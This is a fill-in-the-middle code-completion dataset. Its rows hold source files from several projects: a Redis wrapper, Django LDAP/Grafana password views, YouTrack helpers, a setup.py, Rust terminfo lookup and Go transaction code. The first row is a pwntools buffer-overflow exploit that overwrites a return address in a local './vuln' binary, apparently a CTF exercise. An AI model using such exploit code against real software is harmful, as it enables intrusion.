Dataset schema:
prompt: large_string, lengths 70 to 991k
completion: large_string, lengths 0 to 1.02k
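
Each row below is a fill-in-the-middle (FIM) code-completion pair: the prompt wraps one source file in `<|file_name|>` / `<|fim▁begin|>` / `<|fim▁hole|>` / `<|fim▁end|>` sentinels, and the completion is the span of code that belongs at the hole. A minimal sketch of how such a pair could be assembled is shown here; the sentinel strings are copied from the rows themselves, while the hole-selection logic is an assumption about how this particular dataset was produced.

```python
# Sketch only: the sentinels match the rows below, but how holes were
# actually chosen for this dataset is an assumption.
import random

HEADER = "<|file_name|>{name}<|end_file_name|><|fim▁begin|>"

def make_fim_pair(name, source, rng):
    """Cut one contiguous span out of `source`; return (prompt, completion)."""
    lines = source.splitlines(keepends=True)
    if len(lines) < 3:
        return None                      # too short to carve a hole from
    start = rng.randrange(1, len(lines) - 1)
    end = min(start + rng.randint(1, 3), len(lines) - 1)
    prefix = "".join(lines[:start])
    middle = "".join(lines[start:end])   # becomes the completion
    suffix = "".join(lines[end:])
    prompt = (HEADER.format(name=name) + prefix
              + "<|fim▁hole|>" + suffix + "<|fim▁end|>")
    return prompt, middle.rstrip("\n")
```

For instance, `make_fim_pair('setup.py', src, random.Random(0))` yields one (prompt, completion) row of the same shape as the samples that follow.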
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template ./vuln from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('./vuln') def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) gdbscript = ''' break *0x{exe.symbols.main:x} continue '''.format(**locals())<|fim▁hole|>#payload = 'A'*64 payload += p32(0x80485e6) io.sendline(payload) io.interactive()<|fim▁end|>
io = start() payload = cyclic(76)
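
The `cyclic(76)` pad in this completion is the distance from the vulnerable buffer to the saved return address, and `0x80485e6` is the address the exploit returns into. With pwntools, that offset is usually recovered from a crash rather than guessed. A sketch of the standard workflow follows; the faulting EIP value is hypothetical, and a 32-bit target is assumed (as `p32()` implies).

```python
# Sketch: derive the 76-byte offset with a De Bruijn pattern. The EIP value
# below is a hypothetical crash artifact, not taken from the sample.
from pwn import cyclic, cyclic_find, p32

pattern = cyclic(128)               # longer than the suspected buffer
# ...crash the binary under GDB with `pattern` and read the faulting EIP...
faulting_eip = 0x61616174           # hypothetical value observed in the crash
offset = cyclic_find(faulting_eip)  # maps back to offset 76 for this pattern
payload = cyclic(offset) + p32(0x80485E6)  # return address from the sample
```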
<|file_name|>rediswrapper.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2014 kingsoft #include <stdio.h> #include <stdlib.h> #include <string> #include "hiredis/adapters/libuv.h" #include "hiredis/hiredis.h" #include "hiredis/async.h" #include "./rediswrapper.h" #ifndef see_here #define see_here dba_err("check here [%s:%d:%s]\n", __FILE__, __LINE__, __func__) #endif #ifndef dba_dbg #define dba_dbg(fmt, ...) \ fprintf(stdout, fmt, ##__VA_ARGS__); #endif #ifndef dba_err #define dba_err(fmt, ...) \ fprintf(stderr, fmt, ##__VA_ARGS__); #endif namespace immortal { namespace db { using std::string; std::tuple<string, uint16_t> ParseAddr(const string& addr); static void ConnectCallback(const redisAsyncContext *c, int status) { if (status != REDIS_OK) { fprintf(stderr, "Error: %s\n", c->errstr); auto r = (RedisClient *)c->data; r->InitRedis(); return; } printf("Connected...\n"); } static void DisconnectCallback(const redisAsyncContext *c, int status) { if (status != REDIS_OK) { fprintf(stderr, "Error: %s\n", c->errstr); }<|fim▁hole|> printf("Disconnected...and try to reconnect\n"); auto r = (RedisClient *)c->data; r->InitRedis(); } static void RedisSetCallback2(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); err = -1; return; } else if (reply->type != REDIS_REPLY_STATUS) { dba_err("redis bug!? HMSET reply should be status, but %d\n", reply->type); } else { // dba_dbg("%s\n", reply->str); } cb(seq, NULL, 0, err); } static void RedisCommandCallback(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); err = -1; return; } else if (reply->type == REDIS_REPLY_STATUS) { } else { } cb(seq, NULL, 0, err); } static void RedisGetCallback2(redisAsyncContext *c, void *r, void *privdata) { uint32_t seq = (uintptr_t)privdata; auto cb = ((RedisClient *)c->data)->cb_; redisReply *reply = (redisReply *)r; int err = 0; if (reply == NULL) { dba_err("redis bug!? reply is NULL\n"); return; } else if (reply->type == REDIS_REPLY_NIL) { // dba_dbg("no data\n"); } else if (reply->type != REDIS_REPLY_STRING) { dba_err("redis bug!? GET reply should be str, but %d\n", reply->type); err = -1; } cb(seq, reply->str, reply->len, err); } int RedisClient::Get(uint32_t seq, const char *key) { int r; r = redisAsyncCommand(redis_ctx_, RedisGetCallback2, (void *)(uintptr_t)seq, "GET %s", key); if (r != 0) { dba_err("redisAsyncCommand GET error\n"); return -1; } return 0; } int RedisClient::Set(uint32_t seq, const char *key, const char *buf, size_t len) { int r; r = redisAsyncCommand(redis_ctx_, RedisSetCallback2, (void *)(uintptr_t)seq, "SET %s %b", key, buf, len); if (r != 0) { dba_err("redisAsyncCommand SET error\n"); return -1; } return 0; } int RedisClient::Del(uint32_t seq, const char *key) { int r; r = redisAsyncCommand(redis_ctx_, RedisSetCallback2, (void *)(uintptr_t)seq, "DEL %s", key); if (r != 0) { dba_err("redisAsyncCommand DEL error\n"); return -1; } return 0; } int RedisClient::Command(uint32_t seq, const char *fmt, ...) 
{ int r; va_list ap; va_start(ap, fmt); r = redisvAsyncCommand(redis_ctx_, RedisCommandCallback, (void *)(uintptr_t)seq, fmt, ap); va_end(ap); if (r != 0) { dba_err("redisvAsyncCommand error\n"); return -1; } return 0; } #if 0 int RedisClient::HSet(Handle *req, google::protobuf::Message *msg) { dbaproto::Record *save = (dbaproto::Record *)(msg); // TODO(lijie3): select redis conn by table name req->data = dba_; int r; // Start copy save to redis protocol // COMMAND KEY args... int argc = 2 + save->values_size() * 2; const char **argv = (const char **)malloc(sizeof(char *) * argc); size_t *argvlen = (size_t *)malloc(sizeof(size_t) * argc); // set command argv[0] = "HMSET"; argvlen[0] = strlen(argv[0]); // set key argv[1] = save->key().value().c_str(); argvlen[1] = save->key().value().size(); // set args for (int i = 0, j = 2; i < save->values_size(); i++) { argv[j] = (char *)(save->values(i).field().c_str()); argvlen[j] = save->values(i).field().size(); j++; argv[j] = (char *)(save->values(i).value().c_str()); argvlen[j] = save->values(i).value().size(); j++; } r = redisAsyncCommandArgv(redis_ctx_, RedisHSetCallback, req, argc, argv, argvlen); free(argv); free(argvlen); if (r != 0) { fprintf(stderr, "redisAsyncCommand HMSET error\n"); return -1; } return 0; } #endif int RedisClient::InitRedis() { printf("connect redis %s:%d\n", ip_.c_str(), port_); redis_ctx_ = redisAsyncConnect(ip_.c_str(), port_); if (redis_ctx_->err) { fprintf(stderr, "Error: %s\n", redis_ctx_->errstr); redisAsyncFree(redis_ctx_); return -1; } int r = redisLibuvAttach(redis_ctx_, loop_); if (r != REDIS_OK) { fprintf(stderr, "redis attach to libuv failed\n"); redisAsyncFree(redis_ctx_); return -1; } // save current env redis_ctx_->data = (void *)this; redisAsyncSetConnectCallback(redis_ctx_, ConnectCallback); redisAsyncSetDisconnectCallback(redis_ctx_, DisconnectCallback); return 0; } int RedisClient::Init(RedisCallback_t cb, void *loop, const std::string& ip, uint32_t port) { cb_ = cb; loop_ = (uv_loop_t *)loop; ip_ = ip; port_ = port; return InitRedis(); } int RedisClient::Init(RedisCallback_t cb, void *loop, const std::string& url) { auto tup = ParseAddr(url); auto ip = std::get<0>(tup); auto port = std::get<1>(tup); return Init(cb, loop, ip, port); } } // namespace dba } // namespace immortal<|fim▁end|>
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import #from urllib.parse import urlparse, urlunparse from builtins import str from builtins import range from django.conf import settings # Avoid shadowing the login() and logout() views below. from django.contrib.auth import ( REDIRECT_FIELD_NAME, get_user_model, login as auth_login, logout as auth_logout, update_session_auth_hash, ) from django.contrib.auth.decorators import login_required from django.contrib.auth.forms import ( AuthenticationForm, PasswordChangeForm, PasswordResetForm, SetPasswordForm,AdminPasswordChangeForm, ) from django.contrib.auth.tokens import default_token_generator from django.contrib.sites.shortcuts import get_current_site from django.http import HttpResponseRedirect, QueryDict from django.shortcuts import resolve_url from django.shortcuts import render from django.template.response import TemplateResponse from django.urls import reverse, reverse_lazy from django.utils.decorators import method_decorator #from django.utils.deprecation import RemovedInDjango21Warning from django.utils.encoding import force_text from django.utils.http import is_safe_url, urlsafe_base64_decode from django.utils.translation import gettext_lazy as _ from django.views.decorators.cache import never_cache from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.generic.base import TemplateView from django.views.generic.edit import FormView UserModel = get_user_model() from django.contrib.auth.models import User from django.http import HttpResponse from django.template import loader import random import string #import user from .forms import UserForm from stack_configs.stack_functions import createInfluxDB from stack_configs.ldap_functions import addToLDAPGroup,resetLDAPpassword,createLDAPuser from stack_configs.grafana_functions import GrafanaUser,testObj import logging logger = logging.getLogger(__name__) # Create your views here. # Create your views here. #from django.contrib.auth.forms import UserCreationForm def index(request): template = loader.get_template('welcome.html') result="welcome" context = { 'content':result, 'has_permission':request.user.is_authenticated, 'is_popup':False, 'title':'welcome!', 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def create_account(request): template = loader.get_template('admin/base_site.html') if request.method == "POST": form = UserForm(request.POST) if form.is_valid(): password = form.cleaned_data['password'] new_user = User.objects.create_user(**form.cleaned_data) #new_user.is_staff=True #new_user.save() if (createLDAPuser(new_user,password)): if (addToLDAPGroup(new_user.username,'active')): if (addToLDAPGroup(new_user.username,'editor')): result=createAndConfigureGrafana(new_user,password) if (result.status): if createInfluxDB(new_user): #creates a user database in influx return HttpResponseRedirect('/thanks/') return HttpResponseRedirect('/account_create_error/') else: form = UserForm() context = { 'has_permission':request.user.is_authenticated, 'is_popup':False, 'form':form, 'title':'New User Creation', 'site_title':'zibawa', 'site_url':settings.SITE_URL } return render(request,'form.html',context) def thanks(request): template = loader.get_template('thanks.html') context = { 'content':'Thanks. 
Please log in to your dashboard', 'title':'Your account has been created', 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def account_create_error(request): template = loader.get_template('admin/base_site.html') context = { 'content':'Sorry. Something went wrong during the creation of your account. Please contact your administrator', 'title':'Error', 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return HttpResponse(template.render(context, request)) def id_generator(size=10, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) # Doesn't need csrf_protect since no-one can guess the URL @sensitive_post_parameters() @never_cache def zibawa_password_reset_confirm(request, uidb64=None, token=None, template_name='registration/password_reset_confirm.html', token_generator=default_token_generator, set_password_form=SetPasswordForm,<|fim▁hole|> post_reset_redirect=None, extra_context=None): """ ZIBAWA NOTE. THIS VIEW CODE IS COPIED FROM DJANGO DEFAULT VIEW WITH MINOR MODIFICATIONS TO UPDATE PASSWORD IN LDAP (INSTEAD OF THE DJANGO DATABASE) https://github.com/django/django/blob/master/django/contrib/auth/views.py Check the hash in a password reset link and present a form for entering a new password. warnings.warn("The password_reset_confirm() view is superseded by the " "class-based PasswordResetConfirmView().", RemovedInDjango21Warning, stacklevel=2)""" assert uidb64 is not None and token is not None # checked by URLconf if post_reset_redirect is None: post_reset_redirect = reverse('password_reset_complete') else: post_reset_redirect = resolve_url(post_reset_redirect) try: # urlsafe_base64_decode() decodes to bytestring uid = force_text(urlsafe_base64_decode(uidb64)) user = UserModel._default_manager.get(pk=uid) except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist): user = None if user is not None and token_generator.check_token(user, token): validlink = True title = _('Enter new password') if request.method == 'POST': form = set_password_form(user, request.POST) if form.is_valid(): form.save() #ZIBAWA MODIFICATIONS START HERE new_password = form.cleaned_data['new_password1'] if(resetLDAPpassword(user.username,new_password)): #change Grafana password grafana_user=GrafanaUser(request.user.id, request.user.username,new_password,request.user.email) logger.debug('resetting Grafana password for %s',request.user.username) if not (grafana_user.changeGrafanaPassword()): #if fails, currently we log but carry on regardless. 
logger.warning('couldnt reset Grafana password for %s',request.user.username) return HttpResponseRedirect(post_reset_redirect) else: #if result from LDAP is not what we expect, or if no result logger.warning('couldnt reset LDAP password') title = _('Could not reset LDAP password') #ZIBAWA MODIFICATIONS END HERE else: form = set_password_form(user) else: validlink = False form = None title = _('Password reset unsuccessful') context = { 'form': form, 'title': title, 'validlink': validlink, 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } if extra_context is not None: context.update(extra_context) return TemplateResponse(request, template_name, context) @sensitive_post_parameters() @csrf_protect @login_required def zibawa_password_change(request, template_name='registration/password_change_form.html', post_change_redirect=None, password_change_form=SetPasswordForm, extra_context=None): '''warnings.warn("The password_change() view is superseded by the " "class-based PasswordChangeView().", RemovedInDjango21Warning, stacklevel=2)''' if post_change_redirect is None: post_change_redirect = reverse('password_change_done') else: post_change_redirect = resolve_url(post_change_redirect) if request.method == "POST": form = password_change_form(user=request.user, data=request.POST) if form.is_valid(): form.save() # Updating the password logs out all other sessions for the user # except the current one. #ZIBAWA MODIFICATIONS START HERE new_password = form.cleaned_data['new_password1'] if(resetLDAPpassword(request.user.username,new_password)): logger.debug('reset LDAP password') update_session_auth_hash(request, form.user) #change Grafana password grafana_user=GrafanaUser(request.user.id, request.user.username,new_password,request.user.email) logger.debug('resetting Grafana password for %s',request.user.username) if not (grafana_user.changeGrafanaPassword()): #if fails, currently we carry on regardless. 
logger.warning('couldnt reset Grafana password for %s',request.user.username) return HttpResponseRedirect(post_change_redirect) #if result from LDAP is not what we expect, or if no result else: logger.warning('couldnt reset LDAP password') context = { 'form': form, 'title': _('Could not reset LDAP password'), 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } return TemplateResponse(request, template_name, context) #ZIBAWA MODIFICATIONS END HERE else: form = password_change_form(user=request.user) context = { 'form': form, 'title': _('Password change'), 'is_popup':False, 'has_permission':request.user.is_authenticated, 'site_title':'zibawa', 'site_url':settings.SITE_URL } if extra_context is not None: context.update(extra_context) return TemplateResponse(request, template_name, context) def createAndConfigureGrafana(zibawa_user,password): grafana_user=GrafanaUser(zibawa_user.id, zibawa_user.username,password,zibawa_user.email) result=testObj("GrafanaAccount",True,"Your account already exists on Grafana from a previous installation please contact your administrator") if not (grafana_user.exists()): result=testObj("GrafanaAccount",False,"We were unable to create your dashboard account on Grafana, please contact your adminitrator") logger.info('trying to create grafana user') if grafana_user.create(): result=testObj("GrafanaAccount",True, "Your account has been created, but not configured") logger.info("trying to find non grafana admin org") if not (grafana_user.get_orgID()): logger.info("no org found for user, adding to own org") grafana_user.add_to_own_org() #run get org id again, to ensure created correctly. grafana_user.get_orgID() logger.info("running fix permissions for Grafana") grafana_user.fix_permissions() logger.info("running add datasource for Grafana") if (grafana_user.add_datasource()): result=testObj("GrafanaAccount",True,"Your account has been created and configured") return result<|fim▁end|>
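
The `UserForm` imported at the top of this views module is not part of the sample, but `create_account()` constrains it: `cleaned_data` must unpack cleanly into `User.objects.create_user(**form.cleaned_data)` and must include a `password` key for the LDAP and Grafana provisioning calls. A minimal compatible sketch, with the exact fields assumed rather than known:

```python
# Hypothetical reconstruction of the missing forms.py; only the fields that
# create_account() above demonstrably consumes are included.
from django import forms

class UserForm(forms.Form):
    username = forms.CharField(max_length=150)
    email = forms.EmailField()
    # Read via cleaned_data['password'] and forwarded to LDAP/Grafana.
    password = forms.CharField(widget=forms.PasswordInput)
```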
<|file_name|>import_helper.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from youtrack import YouTrackException def utf8encode(source): if isinstance(source, str): source = source.encode('utf-8') return source def _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached=False, additional_params=None): if additional_params is None: additional_params = dict([]) field = _get_custom_field(connection, cf_name) if field is not None: if field.type != cf_type: msg = "Custom field with name [ %s ] already exists. It has type [ %s ] instead of [ %s ]" % \ (utf8encode(cf_name), field.type, cf_type) raise LogicException(msg) else: connection.create_custom_field_detailed(cf_name, cf_type, False, True, auto_attached, additional_params) def _get_custom_field(connection, cf_name): existing_fields = [item for item in connection.get_custom_fields() if utf8encode(item.name).lower() == utf8encode(cf_name).lower()] if len(existing_fields): return existing_fields[0] return None def create_custom_field(connection, cf_type, cf_name, auto_attached, value_names=None, bundle_policy="0"): """ Creates custom field prototype(if not exist) and sets default values bundle if needed Args: connection: An opened Connection instance. cf_type: Type of custom field to be created cf_name: Name of custom field that should be created (if not exists) auto_attached: If this field should be auto attached or not. value_names: Values, that should be attached with this cf by default. If None, no bundle is created to this field, if empty, empty bundle is created. bundle_policy: ??? Raises: LogicException: If custom field already exists, but has wrong type. YouTrackException: If something is wrong with queries. """ if (value_names is None) and (not auto_attached or "[" not in cf_type): _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached) return if value_names is None: value_names = set([]) else: value_names = set(value_names) field = _get_custom_field(connection, cf_name) if field is not None: if hasattr(field, "defaultBundle"): bundle = connection.get_bundle(field.type, field.defaultBundle) elif field.autoAttached: return else: bundle = create_bundle_safe(connection, cf_name + "_bundle", cf_type) else: bundle = create_bundle_safe(connection, cf_name + "_bundle", cf_type) _create_custom_field_prototype(connection, cf_type, cf_name, auto_attached, {"defaultBundle": bundle.name, "attachBundlePolicy": bundle_policy}) for value_name in value_names: try: connection.add_value_to_bundle(bundle, value_name) except YouTrackException: pass # # values_to_add = calculate_missing_value_names(bundle, value_names) # [connection.addValueToBundle(bundle, name) for name in values_to_add] # if field is None: # bundle_name = cf_name + "_bundle" # _create_bundle_safe(connection, bundle_name, cf_type) # bundle = connection.getBundle(cf_type, bundle_name) # values_to_add = calculate_missing_value_names(bundle, value_names) # # # for value in values_to_add: # connection.addValueToBundle(bundle, value) # # def process_custom_field(connection, project_id, cf_type, cf_name, value_names=None): """ Creates custom field and attaches it to the project. If custom field already exists and has type cf_type it is attached to the project. If it has another type, LogicException is raised. If project field already exists, uses it and bundle from it. If not, creates project field and bundle with name <cf_name>_bundle_<project_id> for it. Adds value_names to bundle. Args: connection: An opened Connection instance. 
project_id: Id of the project to attach CF to. cf_type: Type of cf to be created. cf_name: Name of cf that should be created (if not exists) and attached to the project (if not yet attached) value_names: Values, that cf must have. If None, does not create any bundle for the field. If empty list, creates bundle, but does not create any value_names in it. If bundle already contains some value_names, only value_names that do not already exist are added. Raises: LogicException: If custom field already exists, but has wrong type. YouTrackException: If something is wrong with queries. """ _create_custom_field_prototype(connection, cf_type, cf_name) if cf_type[0:-3] not in connection.bundle_types: value_names = None elif value_names is None: value_names = [] existing_project_fields = [item for item in connection.getProjectCustomFields(project_id) if utf8encode(item.name) == cf_name] if len(existing_project_fields): if value_names is None: return bundle = connection.getBundle(cf_type, existing_project_fields[0].bundle)<|fim▁hole|> values_to_add = calculate_missing_value_names(bundle, value_names) else: if value_names is None: connection.createProjectCustomFieldDetailed(project_id, cf_name, "No " + cf_name) return bundle = create_bundle_safe(connection, cf_name + "_bundle_" + project_id, cf_type) values_to_add = calculate_missing_value_names(bundle, value_names) connection.createProjectCustomFieldDetailed(project_id, cf_name, "No " + cf_name, params={"bundle": bundle.name}) for name in values_to_add: connection.addValueToBundle(bundle, bundle.createElement(name)) def add_values_to_bundle_safe(connection, bundle, values): """ Adds values to specified bundle. Checks, whether each value already contains in bundle. If yes, it is not added. Args: connection: An opened Connection instance. bundle: Bundle instance to add values in. values: Values, that should be added in bundle. Raises: YouTrackException: if something is wrong with queries. """ for value in values: try: connection.addValueToBundle(bundle, value) except YouTrackException as e: if e.response.status == 409: print("Value with name [ %s ] already exists in bundle [ %s ]" % (utf8encode(value.name), utf8encode(bundle.name))) else: raise e def create_bundle_safe(connection, bundle_name, bundle_type): bundle = connection.bundle_types[bundle_type[0:-3]](None, None) bundle.name = bundle_name try: connection.createBundle(bundle) except YouTrackException as e: if e.response.status == 409: print("Bundle with name [ %s ] already exists" % bundle_name) else: raise e return connection.getBundle(bundle_type, bundle_name) def calculate_missing_value_names(bundle, value_names): bundle_elements_names = [elem.name.lower() for elem in bundle.values] return [value for value in value_names if value.lower() not in bundle_elements_names] class LogicException(Exception): def __init__(self, msg): Exception.__init__(self, msg)<|fim▁end|>
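
As a usage sketch, a typical call into these helpers might look like the following. The host, credentials, project id and value names are placeholders, and the `Connection` import path should be verified against the youtrack client version in use.

```python
# Illustrative only: placeholder server, credentials and field values.
from youtrack.connection import Connection  # verify path for your version
from import_helper import create_custom_field, process_custom_field

connection = Connection('https://youtrack.example.com', 'admin', 'secret')

# Auto-attached enum field with two starter values.
create_custom_field(connection, 'enum[1]', 'Subsystem', True,
                    value_names=['UI', 'Backend'])

# Create the field if needed, then attach it to one project's settings.
process_custom_field(connection, 'DEMO', 'enum[1]', 'Severity',
                     value_names=['Minor', 'Major'])
```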
<|file_name|>setup.py<|end_file_name|><|fim▁begin|># This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. from setuptools import setup PACKAGE_NAME = 'mozdevice' PACKAGE_VERSION = '0.44' deps = ['mozfile >= 1.0', 'mozlog >= 2.1',<|fim▁hole|> 'mozprocess >= 0.19', ] setup(name=PACKAGE_NAME, version=PACKAGE_VERSION, description="Mozilla-authored device management", long_description="see http://mozbase.readthedocs.org/", classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers keywords='', author='Mozilla Automation and Testing Team', author_email='[email protected]', url='https://wiki.mozilla.org/Auto-tools/Projects/Mozbase', license='MPL', packages=['mozdevice'], include_package_data=True, zip_safe=False, install_requires=deps, entry_points=""" # -*- Entry points: -*- [console_scripts] dm = mozdevice.dmcli:cli sutini = mozdevice.sutini:main """, )<|fim▁end|>
'moznetwork >= 0.24',
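
The `console_scripts` entry points in this setup.py mean that, once the package is installed, the `dm` and `sutini` commands resolve to ordinary Python callables. The `dm` command, for example, is equivalent to the sketch below; the module path comes from the entry-point spec above, not from inspecting the package.

```python
# What the installed `dm` console script expands to, per entry_points above.
from mozdevice.dmcli import cli

if __name__ == '__main__':
    cli()
```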
<|file_name|>searcher.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! ncurses-compatible database discovery //! //! Does not support hashed database, only filesystem! use std::io::File; use std::io::fs::PathExtensions; use std::os::getenv; use std::os; /// Return path to database entry for `term` pub fn get_dbpath_for_term(term: &str) -> Option<Box<Path>> { if term.len() == 0 { return None; } let homedir = os::homedir(); let mut dirs_to_search = Vec::new(); let first_char = term.char_at(0); // Find search directory match getenv("TERMINFO") { Some(dir) => dirs_to_search.push(Path::new(dir)), None => { if homedir.is_some() { // ncurses compatibility; dirs_to_search.push(homedir.unwrap().join(".terminfo")) } match getenv("TERMINFO_DIRS") { Some(dirs) => for i in dirs.split(':') { if i == "" { dirs_to_search.push(Path::new("/usr/share/terminfo")); } else { dirs_to_search.push(Path::new(i)); } }, // Found nothing in TERMINFO_DIRS, use the default paths: // According to /etc/terminfo/README, after looking at // ~/.terminfo, ncurses will search /etc/terminfo, then // /lib/terminfo, and eventually /usr/share/terminfo. None => { dirs_to_search.push(Path::new("/etc/terminfo")); dirs_to_search.push(Path::new("/lib/terminfo")); dirs_to_search.push(Path::new("/usr/share/terminfo")); } } } }; // Look for the terminal in all of the search directories for p in dirs_to_search.iter() { if p.exists() { let f = first_char.to_string(); let newp = p.join_many(&[&f[], term]); if newp.exists() { return Some(box newp); } // on some installations the dir is named after the hex of the char (e.g. OS X) let f = format!("{:x}", first_char as uint); let newp = p.join_many(&[&f[], term]); if newp.exists() { return Some(box newp); } } } None } /// Return open file for `term` pub fn open(term: &str) -> Result<File, String> { match get_dbpath_for_term(term) { Some(x) => { match File::open(&*x) { Ok(file) => Ok(file), Err(e) => Err(format!("error opening file: {:?}", e)), } } None => { Err(format!("could not find terminfo entry for {:?}", term)) } } } #[test] #[ignore(reason = "buildbots don't have ncurses installed and I can't mock everything I need")] fn test_get_dbpath_for_term() { // woefully inadequate test coverage // note: current tests won't work with non-standard terminfo hierarchies (e.g. OS X's) use std::os::{setenv, unsetenv}; // FIXME (#9639): This needs to handle non-utf8 paths fn x(t: &str) -> String { let p = get_dbpath_for_term(t).expect("no terminfo entry found"); p.as_str().unwrap().to_string() }; assert!(x("screen") == "/usr/share/terminfo/s/screen"); assert!(get_dbpath_for_term("") == None); setenv("TERMINFO_DIRS", ":"); assert!(x("screen") == "/usr/share/terminfo/s/screen"); unsetenv("TERMINFO_DIRS"); } #[test] #[ignore(reason = "see test_get_dbpath_for_term")] fn test_open() { open("screen").unwrap();<|fim▁hole|>}<|fim▁end|>
let t = open("nonexistent terminal that hopefully does not exist"); assert!(t.is_err());
<|file_name|>txn.go<|end_file_name|><|fim▁begin|>// Copyright 2015 The Cockroach Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or // implied. See the License for the specific language governing // permissions and limitations under the License. // // Author: Peter Mattis ([email protected]) package client import ( "strconv" "time" "golang.org/x/net/context" "github.com/cockroachdb/cockroach/roachpb" "github.com/cockroachdb/cockroach/util" "github.com/cockroachdb/cockroach/util/caller" "github.com/cockroachdb/cockroach/util/log" "github.com/cockroachdb/cockroach/util/retry" "github.com/cockroachdb/cockroach/util/tracing" "github.com/gogo/protobuf/proto" basictracer "github.com/opentracing/basictracer-go" ) // DefaultTxnRetryOptions are the standard retry options used // for transactions. // This is exported for testing purposes only. var DefaultTxnRetryOptions = retry.Options{ InitialBackoff: 50 * time.Millisecond, MaxBackoff: 5 * time.Second, Multiplier: 2, } // txnSender implements the Sender interface and is used to keep the Send // method out of the Txn method set. type txnSender Txn // Send updates the transaction on error. Depending on the error type, the // transaction might be replaced by a new one. func (ts *txnSender) Send(ctx context.Context, ba roachpb.BatchRequest) (*roachpb.BatchResponse, *roachpb.Error) { // Send call through wrapped sender. ba.Txn = &ts.Proto // For testing purposes, ts.UserPriority can be a negative value (see // MakePriority). if ts.UserPriority != 0 { ba.UserPriority = ts.UserPriority } br, pErr := ts.wrapped.Send(ts.Context, ba) if br != nil && br.Error != nil { panic(roachpb.ErrorUnexpectedlySet(ts.wrapped, br)) } if br != nil { for _, encSp := range br.CollectedSpans { var newSp basictracer.RawSpan if err := tracing.DecodeRawSpan(encSp, &newSp); err != nil { return nil, roachpb.NewError(err) } ts.CollectedSpans = append(ts.CollectedSpans, newSp) } } // Only successful requests can carry an updated Txn in their response // header. Any error (e.g. a restart) can have a Txn attached to them as // well; those update our local state in the same way for the next attempt. // The exception is if our transaction was aborted and needs to restart // from scratch, in which case we do just that. if pErr == nil { ts.Proto.Update(br.Txn) return br, nil } else if _, ok := pErr.GetDetail().(*roachpb.TransactionAbortedError); ok { // On Abort, reset the transaction so we start anew on restart. ts.Proto = roachpb.Transaction{ TxnMeta: roachpb.TxnMeta{ Isolation: ts.Proto.Isolation, }, Name: ts.Proto.Name, } // Acts as a minimum priority on restart. if pErr.GetTxn() != nil { ts.Proto.Priority = pErr.GetTxn().Priority } } else if pErr.TransactionRestart != roachpb.TransactionRestart_NONE { ts.Proto.Update(pErr.GetTxn()) } return nil, pErr } // Txn is an in-progress distributed database transaction. A Txn is not safe for // concurrent use by multiple goroutines. 
type Txn struct { db DB wrapped Sender Proto roachpb.Transaction UserPriority roachpb.UserPriority Context context.Context // must not be nil CollectedSpans []basictracer.RawSpan // systemConfigTrigger is set to true when modifying keys from the SystemConfig // span. This sets the SystemConfigTrigger on EndTransactionRequest. systemConfigTrigger bool retrying bool } // NewTxn returns a new txn. func NewTxn(db DB) *Txn { txn := &Txn{ db: db, wrapped: db.sender, Context: context.Background(), } txn.db.sender = (*txnSender)(txn) return txn } // SetDebugName sets the debug name associated with the transaction which will // appear in log files and the web UI. Each transaction starts out with an // automatically assigned debug name composed of the file and line number where // the transaction was created. func (txn *Txn) SetDebugName(name string, depth int) { file, line, fun := caller.Lookup(depth + 1) if name == "" { name = fun } txn.Proto.Name = file + ":" + strconv.Itoa(line) + " " + name } // DebugName returns the debug name associated with the transaction. func (txn *Txn) DebugName() string { return txn.Proto.Name } // SetIsolation sets the transaction's isolation type. Transactions default to // serializable isolation. The isolation must be set before any operations are // performed on the transaction. func (txn *Txn) SetIsolation(isolation roachpb.IsolationType) error { if txn.retrying { if txn.Proto.Isolation != isolation { return util.Errorf("cannot change the isolation level of a retrying transaction") } return nil } if txn.Proto.IsInitialized() { return util.Errorf("cannot change the isolation level of a running transaction") } txn.Proto.Isolation = isolation return nil } // 